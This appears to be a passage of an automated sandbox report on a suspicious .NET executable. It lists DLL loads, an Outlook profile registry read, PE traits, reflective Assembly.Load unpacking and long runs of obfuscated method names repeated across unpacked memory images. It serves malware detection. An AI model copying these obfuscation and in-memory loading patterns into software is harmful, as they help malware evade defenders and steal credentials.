                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: UFOiZapHGS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: UFOiZapHGS.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: UFOiZapHGS.exeStatic file information: File size 1147904 > 1048576
                Source: UFOiZapHGS.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x116400
                Source: UFOiZapHGS.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, h0lKaxk7KDkCXCFAkM.cs.Net Code: bLqSokdB6L System.Reflection.Assembly.Load(byte[])
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, h0lKaxk7KDkCXCFAkM.cs.Net Code: bLqSokdB6L System.Reflection.Assembly.Load(byte[])
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, h0lKaxk7KDkCXCFAkM.cs.Net Code: bLqSokdB6L System.Reflection.Assembly.Load(byte[])
                Source: 0.2.UFOiZapHGS.exe.37ab0a8.0.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.UFOiZapHGS.exe.378b088.1.raw.unpack, MainForm.cs.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_0598AE9A push dword ptr [edx+ebp*2-75h]; iretd 0_2_0598AEA7
                Source: C:\Users\user\Desktop\UFOiZapHGS.exeCode function: 0_2_07275978 push cs; ret 0_2_07275979
                Source: UFOiZapHGS.exeStatic PE information: section name: .text entropy: 7.767496510928698
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, z1kK0NZZgC0XJYbnPZ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wSfU0qnPU3', 'a2LUBufKZ5', 'GZgUzdnWQX', 'lB5qH1hQed', 'RSuqAqwrGI', 'hxHqUJm9fW', 'tWGqq5vNFG', 'wLsMBHI2DY8iqSi3Buk'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, UtVPfr1lW3qEpb6TPt.csHigh entropy of concatenated method names: 'Mxg3dTGPfS', 'vSZ3RmJuOL', 'abTZaT5Z0V', 'cUSZFmWnmM', 'dkhZ7gQv3v', 'YYWZsFtv4L', 'g4bZPwtCKb', 'mrLZ8HZ2Mr', 'lyhZYA6rK9', 'oKTZWAcqw5'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, fLgG2NjKayBElw7pF6.csHigh entropy of concatenated method names: 'RlrZXGgiMF', 'mThZCUl661', 'uOxZ6NHIu7', 'lTTZj5IPvr', 'qQuZpwacEf', 'lJZZMgW2yf', 'qRsZIthEDI', 'OH4ZynHUJC', 'C5kZxQnj6I', 'Yi5ZEgi6B9'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, crEQIxYD98kSnOTwPV.csHigh entropy of concatenated method names: 'TO2twh0JGE', 'T6Ctca075y', 'cTgtoxsrYx', 'DH5tXVBQAT', 'UmJtdppDIJ', 'ILotCTGAQr', 'moxtRe3Z64', 'iCnt6hgUp5', 'QaotjSbI6b', 'c0ht1ydm1r'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, F53hZuviP6sCr447Mm.csHigh entropy of concatenated method names: 'KEvriw4YLk', 'xworGQWiJZ', 'T2Vr3YJsFR', 'kQ5rtOwQt9', 'uEJrkqeUoK', 'vs33VBKa0i', 'GDj3K8j11S', 'N7p3DZt0k6', 'A6Q3OidgCv', 'RhE30C0kaO'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, YRPcnen60xXs813G8l.csHigh entropy of concatenated method names: 'rXUQ6nXKG5', 'o3bQjI0K0s', 'EgWQvGRelX', 'tCDQ2nIL1E', 'f9vQFOSrZR', 'v78Q7X7vC7', 'V1EQPA0gKT', 'Un6Q8ncQPO', 'nPoQWltmyo', 'HjLQ5tQ38R'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, c3OKGSsH3otOS2iZPy.csHigh entropy of concatenated method names: 'o6VrNENlJ4', 'Q8YrLgeQJ1', 'U5HrVLtD5f', 'ToString', 'sbErKsfwCB', 'LI9rDoX0G9', 'zTUup72sviCdiyyLt13', 'FUtfm32cbF2lTHWlru6', 'Caugw42roSoAHUGl8RK'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, zooLG2D1NETVSuCcGH.csHigh entropy of concatenated method names: 'NmBxp3Z0XL', 't8DxIpn2mh', 'WyIxxXTt00', 'MO2xub3UL4', 'MoLxlTmpNS', 'VU9xJSnkoA', 'Dispose', 'ahaymnqgb9', 'KCdyGR9Yx0', 'o3UyZ4WhQP'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, ICRvmKAAcQHSY8gbpCE.csHigh entropy of concatenated method names: 'fxDEBNEmfY', 'V8rEzmSQJb', 'z6TuHnmarc', 'AsNuAELGqW', 'HJ8uU3XidO', 'lQjuqmVjNL', 'oUauSHHeJI', 'kxJuixIMhs', 'W4RumGPMLR', 'nlRuGi3uVq'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, EAvKHf0VSryQELm8rN.csHigh entropy of concatenated method names: 'CsKxv3mfhl', 'tSlx2NwHsv', 'FSvxaej5dr', 'IdLxFSTCxY', 'P4Nx7WsrIT', 'o0uxsg2S17', 'jlFxPJQuxO', 'fNYx8lRm21', 'nrLxY8KaQd', 'S17xW7yZdl'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, h0lKaxk7KDkCXCFAkM.csHigh entropy of concatenated method names: 'ASyqiEJqv8', 'jLLqmLRRLq', 'eoqqGH0dfl', 'D5LqZ2asyY', 'OWlq308cG8', 'KtxqrkJG6P', 'ipjqtclgob', 'Gwlqk4ldK5', 'OuIqfyChLB', 'VWcqbKh7qb'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, roFcEIUNPNfMFQtdu2.csHigh entropy of concatenated method names: 'W7koJii1S', 'jBrXD5D3n', 'orICbc1el', 'BUiRYZ8uP', 'x5wjuZfij', 'KpY1Dy5Uu', 'EkCXH3CsfGtlPSEVZq', 'oehIs5ETGHMae6MyIh', 'M8ryy3f92', 'KJfEQHQRx'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, asLAXfB6W5Ixa3Snel.csHigh entropy of concatenated method names: 'Q1LEZWIhqj', 'UQjE3CaSuy', 'PpREr8tbA9', 'fNyEtYGPcm', 'A60ExVr2TN', 'vBbEk4j7JB', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, PF5f0TGGGJmOPQqetg.csHigh entropy of concatenated method names: 'Dispose', 'sTVA0SuCcG', 'hLUU2rr41q', 'tvf7ZSMsuy', 'aIsABqeWKS', 'rXGAzjjd4i', 'ProcessDialogKey', 'S0jUHAvKHf', 'USrUAyQELm', 'LrNUUHsLAX'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, JDtUwoKuo75hSEnrug.csHigh entropy of concatenated method names: 'zieIOyTmVX', 'neNIBHvGtA', 'WT4yHXOisT', 'LOZyAkW50S', 'i0HI5S6tL7', 'evMI94QQVq', 'J8mInvUgUe', 'g3bIeMLaCt', 'gNYIg3QxNS', 'L3nINk91aF'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, noelrBAUQk7dBQSl2gY.csHigh entropy of concatenated method names: 'ToString', 'yMku6Yx4sf', 'Fn0ujM30Ao', 'rp4u1xikvR', 'ovNuvm8hDI', 'W1Gu2g8Zoj', 'iiOuafafRl', 'F5luFaDyQI', 'i45n7CbQqXd0JUVyU4x', 'Jrl2H9bMeEs8tNgWaHe'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, oumZYrSQJH8HN76im8.csHigh entropy of concatenated method names: 'fcuAtTG5u6', 'mvjAke53TX', 'SKaAbyBElw', 'JpFA46VtVP', 'm6TApPt153', 'wZuAMiP6sC', 'KVsaFdZLLG2DyGvymS', 'T2EfIf56drpwg4ZcKh', 'PP9AAQqBfB', 'fwSAq7cR1V'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, qPh7KmAHne0atqquLNL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dR9E5BphVr', 'w5eE9092oh', 'K4iEntiWp5', 'rJUEeD9wbJ', 'Kr6Eget2dA', 'lqOENqoXhD', 'VdIEL8V7LJ'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, rYESTdeEVhin7mQVke.csHigh entropy of concatenated method names: 'WGWpWruvCG', 'Gmmp9WLpPI', 'nB7peYu14W', 'wEypgJcaLU', 'Dd1p2iJkmL', 'osApaxsqEe', 'OWupFHJZq4', 'MwRp7SQ2dH', 'Q8HpsCWIwJ', 'rRhpPOgTi1'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, YsRmyuNdGdZhXTNigh.csHigh entropy of concatenated method names: 'ToString', 'f17M5g9frc', 'wkTM2cajBi', 'CgjMayeyr2', 'IDYMFBUNJf', 'kKVM7TuWNI', 'kajMsDQhtu', 'qB4MPoPFYd', 'y7wM8Eq2Dj', 'tWKMYd4Xf6'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, V8xnZkzbloQN1oqh1t.csHigh entropy of concatenated method names: 'l64ECM7i5f', 'vMgE6Qs4K9', 'NfREjsLPDb', 'CoOEvpk32s', 'fw6E2QrwDK', 'Kv7EFbAETD', 'CghE7r57bQ', 'JOfEJKBimh', 'ynoEw922Df', 'H1fEcKBFLt'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, NfMc5VP5elSuT97t75.csHigh entropy of concatenated method names: 'ywgtm0kyQ7', 'J0gtZLJmEl', 'wB0trIwCvH', 'Hv3rB5sHPi', 'zERrzH82EX', 'PH5tHjs5e4', 'qlCtABQigZ', 'jNttUNyCBd', 'DartqGM4CJ', 'rVGtSpR4FS'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, tTG5u66bvje53TXubH.csHigh entropy of concatenated method names: 'p2wGevn2IC', 'PEyGgFPhUj', 'noYGN2YKnI', 'wRsGLlXtCJ', 'UpTGVbCwn6', 'prAGKP8mxo', 'mpaGDmvV4A', 'HbYGOxLmQK', 'r20G0Hx9nQ', 'rMkGBGTnbC'
                Source: 0.2.UFOiZapHGS.exe.41f6e08.2.raw.unpack, Tb71NqASyY2jsVR0Wv5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vSvTxKdyTK', 'DkdTEO5dMK', 'e9PTuDUXMK', 'yo3TTY05ak', 'sblTlIw1DY', 'RTUThjZcAc', 'EqZTJUADcD'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, z1kK0NZZgC0XJYbnPZ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wSfU0qnPU3', 'a2LUBufKZ5', 'GZgUzdnWQX', 'lB5qH1hQed', 'RSuqAqwrGI', 'hxHqUJm9fW', 'tWGqq5vNFG', 'wLsMBHI2DY8iqSi3Buk'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, UtVPfr1lW3qEpb6TPt.csHigh entropy of concatenated method names: 'Mxg3dTGPfS', 'vSZ3RmJuOL', 'abTZaT5Z0V', 'cUSZFmWnmM', 'dkhZ7gQv3v', 'YYWZsFtv4L', 'g4bZPwtCKb', 'mrLZ8HZ2Mr', 'lyhZYA6rK9', 'oKTZWAcqw5'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, fLgG2NjKayBElw7pF6.csHigh entropy of concatenated method names: 'RlrZXGgiMF', 'mThZCUl661', 'uOxZ6NHIu7', 'lTTZj5IPvr', 'qQuZpwacEf', 'lJZZMgW2yf', 'qRsZIthEDI', 'OH4ZynHUJC', 'C5kZxQnj6I', 'Yi5ZEgi6B9'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, crEQIxYD98kSnOTwPV.csHigh entropy of concatenated method names: 'TO2twh0JGE', 'T6Ctca075y', 'cTgtoxsrYx', 'DH5tXVBQAT', 'UmJtdppDIJ', 'ILotCTGAQr', 'moxtRe3Z64', 'iCnt6hgUp5', 'QaotjSbI6b', 'c0ht1ydm1r'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, F53hZuviP6sCr447Mm.csHigh entropy of concatenated method names: 'KEvriw4YLk', 'xworGQWiJZ', 'T2Vr3YJsFR', 'kQ5rtOwQt9', 'uEJrkqeUoK', 'vs33VBKa0i', 'GDj3K8j11S', 'N7p3DZt0k6', 'A6Q3OidgCv', 'RhE30C0kaO'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, YRPcnen60xXs813G8l.csHigh entropy of concatenated method names: 'rXUQ6nXKG5', 'o3bQjI0K0s', 'EgWQvGRelX', 'tCDQ2nIL1E', 'f9vQFOSrZR', 'v78Q7X7vC7', 'V1EQPA0gKT', 'Un6Q8ncQPO', 'nPoQWltmyo', 'HjLQ5tQ38R'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, c3OKGSsH3otOS2iZPy.csHigh entropy of concatenated method names: 'o6VrNENlJ4', 'Q8YrLgeQJ1', 'U5HrVLtD5f', 'ToString', 'sbErKsfwCB', 'LI9rDoX0G9', 'zTUup72sviCdiyyLt13', 'FUtfm32cbF2lTHWlru6', 'Caugw42roSoAHUGl8RK'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, zooLG2D1NETVSuCcGH.csHigh entropy of concatenated method names: 'NmBxp3Z0XL', 't8DxIpn2mh', 'WyIxxXTt00', 'MO2xub3UL4', 'MoLxlTmpNS', 'VU9xJSnkoA', 'Dispose', 'ahaymnqgb9', 'KCdyGR9Yx0', 'o3UyZ4WhQP'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, ICRvmKAAcQHSY8gbpCE.csHigh entropy of concatenated method names: 'fxDEBNEmfY', 'V8rEzmSQJb', 'z6TuHnmarc', 'AsNuAELGqW', 'HJ8uU3XidO', 'lQjuqmVjNL', 'oUauSHHeJI', 'kxJuixIMhs', 'W4RumGPMLR', 'nlRuGi3uVq'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, EAvKHf0VSryQELm8rN.csHigh entropy of concatenated method names: 'CsKxv3mfhl', 'tSlx2NwHsv', 'FSvxaej5dr', 'IdLxFSTCxY', 'P4Nx7WsrIT', 'o0uxsg2S17', 'jlFxPJQuxO', 'fNYx8lRm21', 'nrLxY8KaQd', 'S17xW7yZdl'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, h0lKaxk7KDkCXCFAkM.csHigh entropy of concatenated method names: 'ASyqiEJqv8', 'jLLqmLRRLq', 'eoqqGH0dfl', 'D5LqZ2asyY', 'OWlq308cG8', 'KtxqrkJG6P', 'ipjqtclgob', 'Gwlqk4ldK5', 'OuIqfyChLB', 'VWcqbKh7qb'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, roFcEIUNPNfMFQtdu2.csHigh entropy of concatenated method names: 'W7koJii1S', 'jBrXD5D3n', 'orICbc1el', 'BUiRYZ8uP', 'x5wjuZfij', 'KpY1Dy5Uu', 'EkCXH3CsfGtlPSEVZq', 'oehIs5ETGHMae6MyIh', 'M8ryy3f92', 'KJfEQHQRx'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, asLAXfB6W5Ixa3Snel.csHigh entropy of concatenated method names: 'Q1LEZWIhqj', 'UQjE3CaSuy', 'PpREr8tbA9', 'fNyEtYGPcm', 'A60ExVr2TN', 'vBbEk4j7JB', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, PF5f0TGGGJmOPQqetg.csHigh entropy of concatenated method names: 'Dispose', 'sTVA0SuCcG', 'hLUU2rr41q', 'tvf7ZSMsuy', 'aIsABqeWKS', 'rXGAzjjd4i', 'ProcessDialogKey', 'S0jUHAvKHf', 'USrUAyQELm', 'LrNUUHsLAX'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, JDtUwoKuo75hSEnrug.csHigh entropy of concatenated method names: 'zieIOyTmVX', 'neNIBHvGtA', 'WT4yHXOisT', 'LOZyAkW50S', 'i0HI5S6tL7', 'evMI94QQVq', 'J8mInvUgUe', 'g3bIeMLaCt', 'gNYIg3QxNS', 'L3nINk91aF'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, noelrBAUQk7dBQSl2gY.csHigh entropy of concatenated method names: 'ToString', 'yMku6Yx4sf', 'Fn0ujM30Ao', 'rp4u1xikvR', 'ovNuvm8hDI', 'W1Gu2g8Zoj', 'iiOuafafRl', 'F5luFaDyQI', 'i45n7CbQqXd0JUVyU4x', 'Jrl2H9bMeEs8tNgWaHe'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, oumZYrSQJH8HN76im8.csHigh entropy of concatenated method names: 'fcuAtTG5u6', 'mvjAke53TX', 'SKaAbyBElw', 'JpFA46VtVP', 'm6TApPt153', 'wZuAMiP6sC', 'KVsaFdZLLG2DyGvymS', 'T2EfIf56drpwg4ZcKh', 'PP9AAQqBfB', 'fwSAq7cR1V'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, qPh7KmAHne0atqquLNL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dR9E5BphVr', 'w5eE9092oh', 'K4iEntiWp5', 'rJUEeD9wbJ', 'Kr6Eget2dA', 'lqOENqoXhD', 'VdIEL8V7LJ'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, rYESTdeEVhin7mQVke.csHigh entropy of concatenated method names: 'WGWpWruvCG', 'Gmmp9WLpPI', 'nB7peYu14W', 'wEypgJcaLU', 'Dd1p2iJkmL', 'osApaxsqEe', 'OWupFHJZq4', 'MwRp7SQ2dH', 'Q8HpsCWIwJ', 'rRhpPOgTi1'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, YsRmyuNdGdZhXTNigh.csHigh entropy of concatenated method names: 'ToString', 'f17M5g9frc', 'wkTM2cajBi', 'CgjMayeyr2', 'IDYMFBUNJf', 'kKVM7TuWNI', 'kajMsDQhtu', 'qB4MPoPFYd', 'y7wM8Eq2Dj', 'tWKMYd4Xf6'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, V8xnZkzbloQN1oqh1t.csHigh entropy of concatenated method names: 'l64ECM7i5f', 'vMgE6Qs4K9', 'NfREjsLPDb', 'CoOEvpk32s', 'fw6E2QrwDK', 'Kv7EFbAETD', 'CghE7r57bQ', 'JOfEJKBimh', 'ynoEw922Df', 'H1fEcKBFLt'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, NfMc5VP5elSuT97t75.csHigh entropy of concatenated method names: 'ywgtm0kyQ7', 'J0gtZLJmEl', 'wB0trIwCvH', 'Hv3rB5sHPi', 'zERrzH82EX', 'PH5tHjs5e4', 'qlCtABQigZ', 'jNttUNyCBd', 'DartqGM4CJ', 'rVGtSpR4FS'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, tTG5u66bvje53TXubH.csHigh entropy of concatenated method names: 'p2wGevn2IC', 'PEyGgFPhUj', 'noYGN2YKnI', 'wRsGLlXtCJ', 'UpTGVbCwn6', 'prAGKP8mxo', 'mpaGDmvV4A', 'HbYGOxLmQK', 'r20G0Hx9nQ', 'rMkGBGTnbC'
                Source: 0.2.UFOiZapHGS.exe.427e628.3.raw.unpack, Tb71NqASyY2jsVR0Wv5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vSvTxKdyTK', 'DkdTEO5dMK', 'e9PTuDUXMK', 'yo3TTY05ak', 'sblTlIw1DY', 'RTUThjZcAc', 'EqZTJUADcD'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, z1kK0NZZgC0XJYbnPZ.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wSfU0qnPU3', 'a2LUBufKZ5', 'GZgUzdnWQX', 'lB5qH1hQed', 'RSuqAqwrGI', 'hxHqUJm9fW', 'tWGqq5vNFG', 'wLsMBHI2DY8iqSi3Buk'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, UtVPfr1lW3qEpb6TPt.csHigh entropy of concatenated method names: 'Mxg3dTGPfS', 'vSZ3RmJuOL', 'abTZaT5Z0V', 'cUSZFmWnmM', 'dkhZ7gQv3v', 'YYWZsFtv4L', 'g4bZPwtCKb', 'mrLZ8HZ2Mr', 'lyhZYA6rK9', 'oKTZWAcqw5'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, fLgG2NjKayBElw7pF6.csHigh entropy of concatenated method names: 'RlrZXGgiMF', 'mThZCUl661', 'uOxZ6NHIu7', 'lTTZj5IPvr', 'qQuZpwacEf', 'lJZZMgW2yf', 'qRsZIthEDI', 'OH4ZynHUJC', 'C5kZxQnj6I', 'Yi5ZEgi6B9'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, crEQIxYD98kSnOTwPV.csHigh entropy of concatenated method names: 'TO2twh0JGE', 'T6Ctca075y', 'cTgtoxsrYx', 'DH5tXVBQAT', 'UmJtdppDIJ', 'ILotCTGAQr', 'moxtRe3Z64', 'iCnt6hgUp5', 'QaotjSbI6b', 'c0ht1ydm1r'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, F53hZuviP6sCr447Mm.csHigh entropy of concatenated method names: 'KEvriw4YLk', 'xworGQWiJZ', 'T2Vr3YJsFR', 'kQ5rtOwQt9', 'uEJrkqeUoK', 'vs33VBKa0i', 'GDj3K8j11S', 'N7p3DZt0k6', 'A6Q3OidgCv', 'RhE30C0kaO'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, YRPcnen60xXs813G8l.csHigh entropy of concatenated method names: 'rXUQ6nXKG5', 'o3bQjI0K0s', 'EgWQvGRelX', 'tCDQ2nIL1E', 'f9vQFOSrZR', 'v78Q7X7vC7', 'V1EQPA0gKT', 'Un6Q8ncQPO', 'nPoQWltmyo', 'HjLQ5tQ38R'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, c3OKGSsH3otOS2iZPy.csHigh entropy of concatenated method names: 'o6VrNENlJ4', 'Q8YrLgeQJ1', 'U5HrVLtD5f', 'ToString', 'sbErKsfwCB', 'LI9rDoX0G9', 'zTUup72sviCdiyyLt13', 'FUtfm32cbF2lTHWlru6', 'Caugw42roSoAHUGl8RK'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, zooLG2D1NETVSuCcGH.csHigh entropy of concatenated method names: 'NmBxp3Z0XL', 't8DxIpn2mh', 'WyIxxXTt00', 'MO2xub3UL4', 'MoLxlTmpNS', 'VU9xJSnkoA', 'Dispose', 'ahaymnqgb9', 'KCdyGR9Yx0', 'o3UyZ4WhQP'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, ICRvmKAAcQHSY8gbpCE.csHigh entropy of concatenated method names: 'fxDEBNEmfY', 'V8rEzmSQJb', 'z6TuHnmarc', 'AsNuAELGqW', 'HJ8uU3XidO', 'lQjuqmVjNL', 'oUauSHHeJI', 'kxJuixIMhs', 'W4RumGPMLR', 'nlRuGi3uVq'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, EAvKHf0VSryQELm8rN.csHigh entropy of concatenated method names: 'CsKxv3mfhl', 'tSlx2NwHsv', 'FSvxaej5dr', 'IdLxFSTCxY', 'P4Nx7WsrIT', 'o0uxsg2S17', 'jlFxPJQuxO', 'fNYx8lRm21', 'nrLxY8KaQd', 'S17xW7yZdl'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, h0lKaxk7KDkCXCFAkM.csHigh entropy of concatenated method names: 'ASyqiEJqv8', 'jLLqmLRRLq', 'eoqqGH0dfl', 'D5LqZ2asyY', 'OWlq308cG8', 'KtxqrkJG6P', 'ipjqtclgob', 'Gwlqk4ldK5', 'OuIqfyChLB', 'VWcqbKh7qb'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, roFcEIUNPNfMFQtdu2.csHigh entropy of concatenated method names: 'W7koJii1S', 'jBrXD5D3n', 'orICbc1el', 'BUiRYZ8uP', 'x5wjuZfij', 'KpY1Dy5Uu', 'EkCXH3CsfGtlPSEVZq', 'oehIs5ETGHMae6MyIh', 'M8ryy3f92', 'KJfEQHQRx'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, asLAXfB6W5Ixa3Snel.csHigh entropy of concatenated method names: 'Q1LEZWIhqj', 'UQjE3CaSuy', 'PpREr8tbA9', 'fNyEtYGPcm', 'A60ExVr2TN', 'vBbEk4j7JB', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, PF5f0TGGGJmOPQqetg.csHigh entropy of concatenated method names: 'Dispose', 'sTVA0SuCcG', 'hLUU2rr41q', 'tvf7ZSMsuy', 'aIsABqeWKS', 'rXGAzjjd4i', 'ProcessDialogKey', 'S0jUHAvKHf', 'USrUAyQELm', 'LrNUUHsLAX'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, JDtUwoKuo75hSEnrug.csHigh entropy of concatenated method names: 'zieIOyTmVX', 'neNIBHvGtA', 'WT4yHXOisT', 'LOZyAkW50S', 'i0HI5S6tL7', 'evMI94QQVq', 'J8mInvUgUe', 'g3bIeMLaCt', 'gNYIg3QxNS', 'L3nINk91aF'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, noelrBAUQk7dBQSl2gY.csHigh entropy of concatenated method names: 'ToString', 'yMku6Yx4sf', 'Fn0ujM30Ao', 'rp4u1xikvR', 'ovNuvm8hDI', 'W1Gu2g8Zoj', 'iiOuafafRl', 'F5luFaDyQI', 'i45n7CbQqXd0JUVyU4x', 'Jrl2H9bMeEs8tNgWaHe'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, oumZYrSQJH8HN76im8.csHigh entropy of concatenated method names: 'fcuAtTG5u6', 'mvjAke53TX', 'SKaAbyBElw', 'JpFA46VtVP', 'm6TApPt153', 'wZuAMiP6sC', 'KVsaFdZLLG2DyGvymS', 'T2EfIf56drpwg4ZcKh', 'PP9AAQqBfB', 'fwSAq7cR1V'
                Source: 0.2.UFOiZapHGS.exe.af70000.6.raw.unpack, qPh7KmAHne0atqquLNL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'dR9E5BphVr', 'w5eE9092oh', 'K4iEntiWp5', 'rJUEeD9wbJ', 'Kr6Eget2dA', 'lqOENqoXhD', 'VdIEL8V7LJ'
